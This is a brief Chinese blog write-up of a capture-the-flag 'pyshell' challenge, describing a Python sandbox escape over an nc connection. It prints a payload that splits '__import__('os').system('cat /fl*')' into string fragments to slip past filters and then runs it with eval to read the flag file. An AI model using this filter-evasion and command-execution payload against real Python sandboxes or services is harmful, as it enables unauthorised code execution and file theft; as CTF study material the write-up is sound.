window.onload=function(){ /*页面加载完成之后生成博客目录*/ BlogDirectory.createBlogDirectory("cnblogs_post_body","h2","h3",20); }

MISC—pyshell

分析了解到沙箱逃逸类型

Nc连接靶机,输入下面指令

'__imp'

_+'ort'

_+'__('

_+"'os"

_+"')."

_+"sys"

_+"tem"

_+"('c"

_+"at "

_+"/fl"

_+"*'"

_+")"

eval(_)

如下图:

posted @ 2023-06-03 11:34  Kicky_Mu  阅读(23)  评论(0编辑  收藏  举报